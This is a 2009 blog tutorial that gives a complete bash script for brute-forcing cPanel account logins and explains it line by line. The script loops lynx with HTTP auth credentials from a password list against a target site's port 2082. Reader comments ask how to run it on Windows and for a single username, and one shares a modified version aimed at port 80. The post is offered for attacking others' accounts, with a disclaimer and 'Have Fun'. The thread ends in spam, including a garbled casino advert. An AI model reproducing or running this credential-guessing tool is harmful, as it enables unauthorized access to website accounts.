Wednesday, January 14, 2009

how to build your own BruteForce tool using linux shell script



Hello, did you ever try to brute force a website login page and you didn't find the right tool?
it always happen, so i will explain how i did it with linux shell script.

I wrote a small script to brute force Cpanel accounts:
============================================
#!/usr/bin/env bash
# Cpanel BruteForce v1.0
# Coded By Dr.Death 2008
# drdeath[at]bsdmail.org
#
# This is a simple script that will brute force Cpanel account
#
# I do not take any reponsibilty for what you do with this tool
# Hopefully it will make your life easier rather then making other
# peoples lives more difficult!
#############################
#  _____       _____             _   _
# | __ \ | __ \ | | | |
# | | | |_ __| | | | ___ __ _| |_| |__
# | | | | '__| | | |/ _ \/ _` | __| '_ \
# | |__| | | _| |__| | __/ (_| | |_| | | |
# |_____/|_|(_)_____/ \___|\__,_|\__|_| |_|

#############################

echo
".::Cpanel BruteForcer By Dr.Death::."
echo
echo -n "Enter domain name for the Cpanel account you want bruteforce:
> "
read site

n=`cat pass_list | wc -l`
for (( i=1; i <= $n; i++));
do

password=`sed -n "$i"p pass_list`

b=`lynx -dump -nolist -auth="$password" ""$site":2082"`

echo trying password $password

if [ ! -z "$b" ]; then

echo "Bengo WebSite "$site" password is: "$password""
echo "Have Fun ;)"
exit 0
fi
done
echo
echo "brute force complete"
echo "no luck, try better dictionary"
exit
==========================================

lets explain what we did:

  • #!/usr/bin/env bash
to execute the script using bash shell from the environment "env".

  • read site
set the user input as variable "$site" which will be the website domain name.

  • n=`cat pass_list | wc -l`
this will print how many lines in file "pass_list" which include passwords list.

  • for (( i=1; i <= $n; i++));
we put the number we got for the variable "$n" in a for loop, so for example if file pass_list have 1000 password on it we will do the for loop 1000 time, to try all the passwords.

  • password=`sed -n "$i"p pass_list`
here we use "sed" the steam editor with option "p" to print all the passwords in the pass_list in each loop.
for example in loop number 4 variable $i will have value of 4 and the sed comand will be like this:
"sed -n 4p pass_list" which will print the 4th line from the password file pass_list.

  • b=`lynx -dump -nolist -auth="$password" ""$site":2082"`
here we use "lynx" the linux command line browser as a socket to connect to the target website.
we use option "-dump" to dump the output instead of waiting user action, "-nolist" to disable the link list feature in dumps, "-auth=" use to set authorization ID and password for protected documents.
for example to access cpanel account for website "example.com" with username "user" and password "pass" it will be like this:
"lynx -dump -nolist -auth=user:pass http://www.example.com:2082"

so password file pass_list should include the usernames and passwords in this format: "username:password"

  • if [ ! -z "$b" ]; then
here we use if statment with option "! -z" which mean if value of "$b" is not equal to Zero we are logged in and the password is the value of the variable "$password" in the loop we are in and exit successfuly, else continue the loop.

Thats all falks :)
Dr.Death

15 comments:

  1. Is There Any Way To Use IT In Windows ?!! i dont know how i mean the bash script !

    ReplyDelete
  2. Hello, yes you can run it with cygwin unix under windows.

    ReplyDelete
  3. i tried it nice script but for sum reason lynx couldnt conect

    ReplyDelete
  4. Hi, try first to connect to the target website using lynx for troubleshoot

    lynx "website.com"
    lynx "website.com:2082"

    check maybe the website doesn't run cpanel on it

    ReplyDelete
  5. hey how to run it in windows 7

    ReplyDelete
  6. what file extension should i use?

    ReplyDelete
  7. Great, thanx. Really useful, I added -read_timeout=30 parameter to the lynx command because I was getting stuck at try ~400.

    The command ends up like this:
    b=`lynx -dump -nolist -read_timeout=30 -auth="$password" ""$site":80"`

    ReplyDelete
  8. How how can i edit this code if i have username and i just want to brute pass for that username ?

    ReplyDelete
  9. nice post frnd i like artical thanks for the artical

    ReplyDelete
  10. Thanks for the sharing this review. Your site is awesome click here for info.

    ReplyDelete
  11. The state will gather a tax of 10% on the web proceeds of sports activities betting exercise to fund implementation of the state water plan and other public functions. The quite a few 우리카지노 sports activities betting sites likeagen Judi Bolaallows you to start out|to begin} betting anytime you want. Moreover, tons of|there are numerous} reliable casinos that you simply won’t even have to search for extra before you begin betting. This means you can start betting each time and wherever you would like. Being ready for any outcome prepares you to manage your emotions.

    ReplyDelete